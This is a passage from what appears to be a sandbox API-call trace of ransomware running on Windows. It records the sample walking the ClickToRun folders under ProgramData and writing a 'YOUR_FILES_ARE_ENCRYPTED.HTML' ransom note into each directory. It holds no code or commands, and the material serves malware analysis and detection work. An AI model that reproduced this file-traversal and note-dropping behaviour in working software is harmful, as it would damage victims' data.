param_1=0x4ebce3a, param_2="%02X" | out: param_1="1D") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="BB") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="80") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="F6") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce4a, param_2="%02X" | out: param_1="DF") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="A3") returned 2 [0155.779] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="78") returned 2 [0155.779] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="03") returned 2 [0155.779] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="B6") returned 2 [0155.779] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: param_1="29") returned 2 [0155.779] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="D2") returned 2 [0155.779] wsprintfW (in: param_1=0x4ebce66, 
param_2="%02X" | out: param_1="CB") returned 2 [0155.779] wsprintfW (in: param_1=0x4ebce6a, param_2="%02X" | out: param_1="C6") returned 2 [0155.779] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="E1") returned 2 [0155.779] wsprintfW (in: param_1=0x4ebce72, param_2="%02X" | out: param_1="44") returned 2 [0155.779] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="02") returned 2 [0155.779] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: param_1="6E") returned 2 [0155.779] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="58") returned 2 [0155.779] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="6B") returned 2 [0155.779] lstrcpyW (in: lpString1=0x746b294, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml" [0155.780] CreateIoCompletionPort (FileHandle=0x5a0, ExistingCompletionPort=0x3a0, CompletionKey=0x745b1e0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0155.780] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x745b1e0, lpOverlapped=0x745b1e0) returned 1 [0155.782] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xa1fe50b0, 
ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x2ef2ef, dwReserved0=0x0, dwReserved1=0x60, cFileName="UserManifest.xml", cAlternateFileName="USERMA~1.XML")) returned 0 [0155.874] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0155.874] wnsprintfW (in: pszDest=0x7410060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 176 [0155.874] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x59c [0155.875] WriteFile (in: hFile=0x59c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0155.877] CloseHandle (hObject=0x59c) returned 1 [0155.877] GetProcessHeap () returned 0x270000 [0155.878] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7410060 | out: hHeap=0x270000) returned 1 [0155.878] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x97377710, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x97377710, ftLastWriteTime.dwHighDateTime=0x1d709b8, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{1A8308C7-90D1-4200-B16E-646F163A08E8}", cAlternateFileName="{1A830~1")) returned 0 [0155.878] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0155.878] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 137 [0155.878] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0155.882] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0155.884] CloseHandle (hObject=0x598) returned 1 [0155.884] GetProcessHeap () returned 0x270000 [0155.885] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0155.885] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3030f410, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x3030f410, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{9AC08E99-230B-47E8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) 
returned 0 [0155.885] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0155.885] wnsprintfW (in: pszDest=0x74481c0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0155.885] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x590 [0155.885] WriteFile (in: hFile=0x590, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0155.887] CloseHandle (hObject=0x590) returned 1 [0155.888] GetProcessHeap () returned 0x270000 [0155.888] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74481c0 | out: hHeap=0x270000) returned 1 [0155.893] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3030f410, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x3030f410, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Packages", cAlternateFileName="")) returned 0 [0155.893] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0155.893] wnsprintfW (in: pszDest=0x74381b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0155.893] 
CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0155.893] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0155.895] CloseHandle (hObject=0x594) returned 1 [0155.895] GetProcessHeap () returned 0x270000 [0155.896] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74381b8 | out: hHeap=0x270000) returned 1 [0155.898] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x312ae470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="Integration", cAlternateFileName="INTEGR~1")) returned 1 [0155.898] wnsprintfW (in: pszDest=0x74281b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration") returned 63 [0155.898] GetProcessHeap () returned 0x270000 [0155.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7400058 [0155.899] lstrcpyW (in: lpString1=0x7400058, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration" 
[0155.899] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\*" [0155.899] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x312ae470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0155.900] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x312ae470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.900] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x312ae470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ShortcutBackups", cAlternateFileName="SHORTC~1")) returned 1 [0155.900] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, 
pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups") returned 79 [0155.900] GetProcessHeap () returned 0x270000 [0155.900] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7410060 [0155.901] lstrcpyW (in: lpString1=0x7410060, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups" [0155.901] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*" [0155.901] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x312ae470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0155.901] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x312ae470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, 
nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.901] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x312ae470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0155.902] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0155.902] wnsprintfW (in: pszDest=0x7410060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0155.902] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x590 [0155.902] WriteFile (in: hFile=0x590, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0155.904] CloseHandle (hObject=0x590) returned 1 [0155.904] GetProcessHeap () returned 0x270000 [0155.905] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7410060 | out: hHeap=0x270000) returned 1 [0155.905] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, 
ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x312ae470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ShortcutBackups", cAlternateFileName="SHORTC~1")) returned 0 [0155.905] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0155.905] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0155.905] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\integration\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0155.906] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0155.908] CloseHandle (hObject=0x594) returned 1 [0155.908] GetProcessHeap () returned 0x270000 [0155.909] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0155.913] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x312ae470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="Integration", 
cAlternateFileName="INTEGR~1")) returned 0 [0155.913] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0155.913] wnsprintfW (in: pszDest=0x74281b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0155.913] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0155.914] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0155.916] CloseHandle (hObject=0x58c) returned 1 [0155.916] GetProcessHeap () returned 0x270000 [0155.917] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74281b0 | out: hHeap=0x270000) returned 1 [0155.920] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f454bf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2f454bf0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2f454bf0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="UserData", cAlternateFileName="")) returned 1 [0155.920] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData") returned 48 [0155.920] GetProcessHeap () returned 0x270000 [0155.920] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7400058 [0155.922] lstrcpyW (in: 
lpString1=0x7400058, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData" [0155.922] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData\\*" [0155.922] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f454bf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2f454bf0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2f454bf0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0155.922] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f454bf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2f454bf0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2f454bf0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0155.922] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f454bf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2f454bf0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2f454bf0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, 
nFileSizeLow=0x0, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 0 [0155.923] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0155.923] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 78 [0155.923] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\userdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0155.923] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0155.925] CloseHandle (hObject=0x58c) returned 1 [0155.925] GetProcessHeap () returned 0x270000 [0155.926] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0155.931] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x92c0e310, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x96130e70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x96130e70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{9AC08E99-230B-47e8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 1 [0155.931] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}") returned 78 [0155.931] GetProcessHeap () 
